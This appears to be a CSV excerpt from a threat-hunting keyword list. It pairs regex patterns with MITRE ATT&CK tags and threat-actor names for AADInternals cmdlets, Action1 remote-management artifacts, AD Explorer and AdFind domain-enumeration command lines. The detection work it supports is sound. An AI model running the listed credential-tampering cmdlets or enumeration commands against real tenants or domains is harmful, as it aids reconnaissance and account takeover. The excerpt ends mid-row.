"*Set-AADIntSyncFeatures*",".{0,1000}Set\-AADIntSyncFeatures.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Set-AADIntTeamsAvailability*",".{0,1000}Set\-AADIntTeamsAvailability.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Set-AADIntTeamsMessageEmotion*",".{0,1000}Set\-AADIntTeamsMessageEmotion.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Set-AADIntTeamsStatusMessage*",".{0,1000}Set\-AADIntTeamsStatusMessage.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation 
tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Set-AADIntTenantGuestAccess*",".{0,1000}Set\-AADIntTenantGuestAccess.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Set-AADIntUnifiedAuditLogSettings*",".{0,1000}Set\-AADIntUnifiedAuditLogSettings.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Set-AADIntUserAgent*",".{0,1000}Set\-AADIntUserAgent.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Set-AADIntUserMFA*",".{0,1000}Set\-AADIntUserMFA.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - 
T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Set-AADIntUserMFAApps*",".{0,1000}Set\-AADIntUserMFAApps.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Set-AADIntUserPassword*",".{0,1000}Set\-AADIntUserPassword.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Start-AADIntCloudShell*",".{0,1000}Start\-AADIntCloudShell.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Start-AADIntDeviceIntuneCallback*",".{0,1000}Start\-AADIntDeviceIntuneCallback.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - 
T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Start-AADIntSpeech*",".{0,1000}Start\-AADIntSpeech.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Update-AADIntADFSFederationSettings!""*",".{0,1000}Update\-AADIntADFSFederationSettings!\"".{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Update-AADIntADFSFederationSettings*",".{0,1000}Update\-AADIntADFSFederationSettings.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" 
"*Update-AADIntSPOSiteFile*",".{0,1000}Update\-AADIntSPOSiteFile.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Update-AADIntSyncCredentials*",".{0,1000}Update\-AADIntSyncCredentials.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*/action1_agent(My_Organization).msi*",".{0,1000}\/action1_agent\(My_Organization\)\.msi.{0,1000}","greyware_tool_keyword","action1","Action1 remote administration tool abused by attackers","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","LockBit - MONTI","RMM","https://app.action1.com/","1","1","N/A","product name","10","10","N/A","N/A","N/A","N/A" "*\Action1\7z.dll*",".{0,1000}\\Action1\\7z\.dll.{0,1000}","greyware_tool_keyword","action1","Action1 remote administration tool abused by attackers","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","LockBit - MONTI","RMM","https://app.action1.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Action1\Agent\Certificate*",".{0,1000}\\Action1\\Agent\\Certificate.{0,1000}","greyware_tool_keyword","action1","Action1 remote administration tool abused by attackers","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","LockBit - 
MONTI","RMM","https://app.action1.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Action1\CrashDumps*",".{0,1000}\\Action1\\CrashDumps.{0,1000}","greyware_tool_keyword","action1","Action1 remote administration tool abused by attackers","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","LockBit - MONTI","RMM","https://app.action1.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Action1\package_downloads*",".{0,1000}\\Action1\\package_downloads.{0,1000}","greyware_tool_keyword","action1","Action1 remote administration tool abused by attackers","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","LockBit - MONTI","RMM","https://app.action1.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Action1\scripts\Run_PowerShell_*",".{0,1000}\\Action1\\scripts\\Run_PowerShell_.{0,1000}","greyware_tool_keyword","action1","Action1 remote administration tool abused by attackers","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","LockBit - MONTI","RMM","https://app.action1.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\action1_agent(My_Organization).msi*",".{0,1000}\\action1_agent\(My_Organization\)\.msi.{0,1000}","greyware_tool_keyword","action1","Action1 remote administration tool abused by attackers","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","LockBit - MONTI","RMM","https://app.action1.com/","1","1","N/A","product name","10","10","N/A","N/A","N/A","N/A" "*\ACTION1_AGENT.EXE-*",".{0,1000}\\ACTION1_AGENT\.EXE\-.{0,1000}","greyware_tool_keyword","action1","Action1 remote administration tool abused by attackers","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","LockBit - MONTI","RMM","https://app.action1.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\action1_log_*.log*",".{0,1000}\\action1_log_.{0,1000}\.log.{0,1000}","greyware_tool_keyword","action1","Action1 remote administration tool abused by attackers","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","LockBit - 
MONTI","RMM","https://app.action1.com/","1","0","N/A","example C:\Windows\Action1\logs\action1_log_2023-12-17_13-42-47~10328.log","10","10","N/A","N/A","N/A","N/A" "*\Windows\Action1\scripts\*",".{0,1000}\\Windows\\Action1\\scripts\\.{0,1000}","greyware_tool_keyword","action1","Action1 remote administration tool abused by attackers","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","LockBit - MONTI","RMM","https://app.action1.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*_renamed_by_Action1*",".{0,1000}_renamed_by_Action1.{0,1000}","greyware_tool_keyword","action1","Action1 remote administration tool abused by attackers","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","LockBit - MONTI","RMM","https://app.action1.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*a1-server-prod-even.action1.com*",".{0,1000}a1\-server\-prod\-even\.action1\.com.{0,1000}","greyware_tool_keyword","action1","Action1 remote administration tool abused by attackers","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","LockBit - MONTI","RMM","https://app.action1.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Action1 Corporation*",".{0,1000}Action1\sCorporation.{0,1000}","greyware_tool_keyword","action1","Action1 remote administration tool abused by attackers","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","LockBit - MONTI","RMM","https://app.action1.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Action1 Endpoint Security*",".{0,1000}Action1\sEndpoint\sSecurity.{0,1000}","greyware_tool_keyword","action1","Action1 remote administration tool abused by attackers","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","LockBit - MONTI","RMM","https://app.action1.com/","1","0","N/A","product name","10","10","N/A","N/A","N/A","N/A" "*Action1*'DestinationPort'>22543*",".{0,1000}Action1.{0,1000}\'DestinationPort\'\>22543.{0,1000}","greyware_tool_keyword","action1","Action1 remote administration tool abused by attackers","T1021 - T1071 - T1090","TA0008 - 
TA0011","N/A","LockBit - MONTI","RMM","https://app.action1.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Action1\batch_data\Run_Script__*",".{0,1000}Action1\\batch_data\\Run_Script__.{0,1000}","greyware_tool_keyword","action1","Action1 remote administration tool abused by attackers","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","LockBit - MONTI","RMM","https://app.action1.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Action1\first_install.tmp*",".{0,1000}Action1\\first_install\.tmp.{0,1000}","greyware_tool_keyword","action1","Action1 remote administration tool abused by attackers","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","LockBit - MONTI","RMM","https://app.action1.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Action1\what_is_this.txt*",".{0,1000}Action1\\what_is_this\.txt.{0,1000}","greyware_tool_keyword","action1","Action1 remote administration tool abused by attackers","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","LockBit - MONTI","RMM","https://app.action1.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*action1_agent.exe*",".{0,1000}action1_agent\.exe.{0,1000}","greyware_tool_keyword","action1","Action1 remote administration tool abused by attackers","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","LockBit - MONTI","RMM","https://app.action1.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*action1_agent.exe.connection*",".{0,1000}action1_agent\.exe\.connection.{0,1000}","greyware_tool_keyword","action1","Action1 remote administration tool abused by attackers","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","LockBit - MONTI","RMM","https://app.action1.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*action1_remote.exe*",".{0,1000}action1_remote\.exe.{0,1000}","greyware_tool_keyword","action1","Action1 remote administration tool abused by attackers","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","LockBit - 
MONTI","RMM","https://app.action1.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*action1_update.exe*",".{0,1000}action1_update\.exe.{0,1000}","greyware_tool_keyword","action1","Action1 remote administration tool abused by attackers","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","LockBit - MONTI","RMM","https://app.action1.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*C:\Windows\Action1\*",".{0,1000}C\:\\Windows\\Action1\\.{0,1000}","greyware_tool_keyword","action1","Action1 remote administration tool abused by attackers","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","LockBit - MONTI","RMM","https://app.action1.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*C:\Windows\System32\config\systemprofile\AppData\Local\Action1*",".{0,1000}C\:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Action1.{0,1000}","greyware_tool_keyword","action1","Action1 remote administration tool abused by attackers","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","LockBit - MONTI","RMM","https://app.action1.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*'Company'>Action1 Corporation*",".{0,1000}\'Company\'\>Action1\sCorporation.{0,1000}","greyware_tool_keyword","action1","Action1 remote administration tool abused by attackers","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","LockBit - MONTI","RMM","https://app.action1.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*CurrentControlSet\Services\A1Agent*",".{0,1000}CurrentControlSet\\Services\\A1Agent.{0,1000}","greyware_tool_keyword","action1","Action1 remote administration tool abused by attackers","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","LockBit - MONTI","RMM","https://app.action1.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*https://app.action1.com/agent/*/Windows/*.msi*",".{0,1000}https\:\/\/app\.action1\.com\/agent\/.{0,1000}\/Windows\/.{0,1000}\.msi.{0,1000}","greyware_tool_keyword","action1","Action1 remote administration tool 
abused by attackers","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","LockBit - MONTI","RMM","https://app.action1.com/","1","1","N/A","https://app.action1.com/agent/{ID}/Windows/agent(My_Organization).msi","10","10","N/A","N/A","N/A","N/A" "*InventoryApplicationFile\action1_agent.ex*",".{0,1000}InventoryApplicationFile\\action1_agent\.ex.{0,1000}","greyware_tool_keyword","action1","Action1 remote administration tool abused by attackers","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","LockBit - MONTI","RMM","https://app.action1.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*InventoryApplicationFile\action1_remote.e*",".{0,1000}InventoryApplicationFile\\action1_remote\.e.{0,1000}","greyware_tool_keyword","action1","Action1 remote administration tool abused by attackers","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","LockBit - MONTI","RMM","https://app.action1.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*server.action1.com*",".{0,1000}server\.action1\.com.{0,1000}","greyware_tool_keyword","action1","Action1 remote administration tool abused by attackers","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","LockBit - MONTI","RMM","https://app.action1.com/","1","1","#dnsquery","dns request","10","10","N/A","N/A","N/A","N/A" "*lcmammnjlbmlbcaniggmlejfjpjagiia*",".{0,1000}lcmammnjlbmlbcaniggmlejfjpjagiia.{0,1000}","greyware_tool_keyword","Adblock Office VPN Proxy Server","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*/AD-common-queries.git*",".{0,1000}\/AD\-common\-queries\.git.{0,1000}","greyware_tool_keyword","AD-common-queries","Collection of common ADSI queries for Domain Account enumeration","T1087 - 
T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/swarleysez/AD-common-queries","1","1","N/A","N/A","8","1","5","3","2020-05-24T03:23:09Z","2020-03-10T19:43:51Z" "*ADUsers-Disabled.txt*",".{0,1000}ADUsers\-Disabled\.txt.{0,1000}","greyware_tool_keyword","AD-common-queries","Collection of common ADSI queries for Domain Account enumeration","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/swarleysez/AD-common-queries","1","0","N/A","N/A","8","1","5","3","2020-05-24T03:23:09Z","2020-03-10T19:43:51Z" "*ADUsers-PasswordNeverExpires.txt*",".{0,1000}ADUsers\-PasswordNeverExpires\.txt.{0,1000}","greyware_tool_keyword","AD-common-queries","Collection of common ADSI queries for Domain Account enumeration","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/swarleysez/AD-common-queries","1","0","N/A","N/A","8","1","5","3","2020-05-24T03:23:09Z","2020-03-10T19:43:51Z" "*ADUsers-PasswordNotRequired.txt*",".{0,1000}ADUsers\-PasswordNotRequired\.txt.{0,1000}","greyware_tool_keyword","AD-common-queries","Collection of common ADSI queries for Domain Account enumeration","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/swarleysez/AD-common-queries","1","0","N/A","N/A","8","1","5","3","2020-05-24T03:23:09Z","2020-03-10T19:43:51Z" "*swarleysez/AD-common-queries*",".{0,1000}swarleysez\/AD\-common\-queries.{0,1000}","greyware_tool_keyword","AD-common-queries","Collection of common ADSI queries for Domain Account enumeration","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - 
TA0009","N/A","N/A","Discovery","https://github.com/swarleysez/AD-common-queries","1","1","N/A","N/A","8","1","5","3","2020-05-24T03:23:09Z","2020-03-10T19:43:51Z" "*\Software\MSDART\Active Directory Explorer*",".{0,1000}\\Software\\MSDART\\Active\sDirectory\sExplorer.{0,1000}","greyware_tool_keyword","adexplorer","Active Directory Explorer (AD Explorer) is an advanced Active Directory (AD) viewer and editor. You can use AD Explorer to easily navigate an AD database. It can be abused by malicious actors","T1003.001 - T1087.001","TA0006 - TA0007","N/A","Lapsus$ - Scattered Spider*","Discovery","https://learn.microsoft.com/en-us/sysinternals/downloads/adexplorer","1","0","N/A","greyware tool - risks of False positive !","7","10","N/A","N/A","N/A","N/A" "*\Software\Sysinternals\Active Directory Explorer*",".{0,1000}\\Software\\Sysinternals\\Active\sDirectory\sExplorer.{0,1000}","greyware_tool_keyword","adexplorer","Active Directory Explorer (AD Explorer) is an advanced Active Directory (AD) viewer and editor. You can use AD Explorer to easily navigate an AD database. It can be abused by malicious actors","T1003.001 - T1087.001","TA0006 - TA0007","N/A","Lapsus$ - Scattered Spider*","Discovery","https://learn.microsoft.com/en-us/sysinternals/downloads/adexplorer","1","0","N/A","greyware tool - risks of False positive !","7","10","N/A","N/A","N/A","N/A" "*AdExp<*",".{0,1000}\AdExp\<.{0,1000}","greyware_tool_keyword","adexplorer","Active Directory Explorer (AD Explorer) is an advanced Active Directory (AD) viewer and editor. You can use AD Explorer to easily navigate an AD database. 
It can be abused by malicious actors","T1003.001 - T1087.001","TA0006 - TA0007","N/A","Lapsus$ - Scattered Spider*","Discovery","https://learn.microsoft.com/en-us/sysinternals/downloads/adexplorer","1","0","N/A","greyware tool - risks of False positive !","7","10","N/A","N/A","N/A","N/A" "*>Active Directory Editor<*",".{0,1000}\>Active\sDirectory\sEditor\<.{0,1000}","greyware_tool_keyword","adexplorer","Active Directory Explorer (AD Explorer) is an advanced Active Directory (AD) viewer and editor. You can use AD Explorer to easily navigate an AD database. It can be abused by malicious actors","T1003.001 - T1087.001","TA0006 - TA0007","N/A","Lapsus$ - Scattered Spider*","Discovery","https://learn.microsoft.com/en-us/sysinternals/downloads/adexplorer","1","0","N/A","greyware tool - risks of False positive !","7","10","N/A","N/A","N/A","N/A" "*>Sysinternals ADExplorer<*",".{0,1000}\>Sysinternals\sADExplorer\<.{0,1000}","greyware_tool_keyword","adexplorer","Active Directory Explorer (AD Explorer) is an advanced Active Directory (AD) viewer and editor. You can use AD Explorer to easily navigate an AD database. It can be abused by malicious actors","T1003.001 - T1087.001","TA0006 - TA0007","N/A","Lapsus$ - Scattered Spider*","Discovery","https://learn.microsoft.com/en-us/sysinternals/downloads/adexplorer","1","0","N/A","greyware tool - risks of False positive !","7","10","N/A","N/A","N/A","N/A" "*adexplorer.exe*",".{0,1000}adexplorer\.exe.{0,1000}","greyware_tool_keyword","adexplorer","Active Directory Explorer (AD Explorer) is an advanced Active Directory (AD) viewer and editor. You can use AD Explorer to easily navigate an AD database. 
It can be abused by malicious actors","T1003.001 - T1087.001","TA0006 - TA0007","N/A","Lapsus$ - Scattered Spider*","Discovery","https://learn.microsoft.com/en-us/sysinternals/downloads/adexplorer","1","1","N/A","greyware tool - risks of False positive !","7","10","N/A","N/A","N/A","N/A" "*adexplorer.zip*",".{0,1000}adexplorer\.zip.{0,1000}","greyware_tool_keyword","adexplorer","Active Directory Explorer (AD Explorer) is an advanced Active Directory (AD) viewer and editor. You can use AD Explorer to easily navigate an AD database. It can be abused by malicious actors","T1003.001 - T1087.001","TA0006 - TA0007","N/A","Lapsus$ - Scattered Spider*","Discovery","https://learn.microsoft.com/en-us/sysinternals/downloads/adexplorer","1","1","N/A","greyware tool - risks of False positive !","7","10","N/A","N/A","N/A","N/A" "*adexplorer64.exe*",".{0,1000}adexplorer64\.exe.{0,1000}","greyware_tool_keyword","adexplorer","Active Directory Explorer (AD Explorer) is an advanced Active Directory (AD) viewer and editor. You can use AD Explorer to easily navigate an AD database. It can be abused by malicious actors","T1003.001 - T1087.001","TA0006 - TA0007","N/A","Lapsus$ - Scattered Spider*","Discovery","https://learn.microsoft.com/en-us/sysinternals/downloads/adexplorer","1","1","N/A","greyware tool - risks of False positive !","7","10","N/A","N/A","N/A","N/A" "*adexplorer64a.exe*",".{0,1000}adexplorer64a\.exe.{0,1000}","greyware_tool_keyword","adexplorer","Active Directory Explorer (AD Explorer) is an advanced Active Directory (AD) viewer and editor. You can use AD Explorer to easily navigate an AD database. 
It can be abused by malicious actors","T1003.001 - T1087.001","TA0006 - TA0007","N/A","Lapsus$ - Scattered Spider*","Discovery","https://learn.microsoft.com/en-us/sysinternals/downloads/adexplorer","1","1","N/A","greyware tool - risks of False positive !","7","10","N/A","N/A","N/A","N/A" "* dclist *",".{0,1000}\sdclist\s.{0,1000}","greyware_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in Lateral Movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1087 - T1016 - T1482","TA0007","N/A","MAZE - BlackSuit - Royal - PLAY - LockBit - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - XingLocker - REvil - Ryuk - NetWalker - INC Ransom - Black Basta - TA505 - Wizard Spider - FIN7 - FIN6 - Akira - APT29 - menuPass","Discovery","https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* -f ""(objectcategory=computer)"" -s subtree dn operatingSystem*",".{0,1000}\s\-f\s\""\(objectcategory\=computer\)\""\s\-s\ssubtree\sdn\soperatingSystem.{0,1000}","greyware_tool_keyword","adfind","Enumerate All Computers in the Domain","T1087 - T1016 - T1482","TA0007","N/A","MAZE - BlackSuit - Royal - PLAY - LockBit - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - XingLocker - REvil - Ryuk - NetWalker - INC Ransom - Black Basta - TA505 - Wizard Spider - FIN7 - FIN6 - Akira - APT29 - menuPass","Discovery","https://www.virustotal.com/gui/file/484dd00e85c033fbfd506b956ac0acd29b30f239755ed753a2788a842425b384/behavior","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* -f ""(objectcategory=person)"" -s subtree samaccountname 
userPrincipalName*",".{0,1000}\s\-f\s\""\(objectcategory\=person\)\""\s\-s\ssubtree\ssamaccountname\suserPrincipalName.{0,1000}","greyware_tool_keyword","adfind","Enumerate All Users in the Domain","T1087 - T1016 - T1482","TA0007","N/A","MAZE - BlackSuit - Royal - PLAY - LockBit - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - XingLocker - REvil - Ryuk - NetWalker - INC Ransom - Black Basta - TA505 - Wizard Spider - FIN7 - FIN6 - Akira - APT29 - menuPass","Discovery","https://www.virustotal.com/gui/file/484dd00e85c033fbfd506b956ac0acd29b30f239755ed753a2788a842425b384/behavior","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* -f ""(objectcategory=trustedDomain)"" -s subtree name trustAttributes trustDirection trustType*",".{0,1000}\s\-f\s\""\(objectcategory\=trustedDomain\)\""\s\-s\ssubtree\sname\strustAttributes\strustDirection\strustType.{0,1000}","greyware_tool_keyword","adfind","Dump All Domain Trusts","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","MAZE - BlackSuit - Royal - PLAY - LockBit - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - XingLocker - REvil - Ryuk - NetWalker 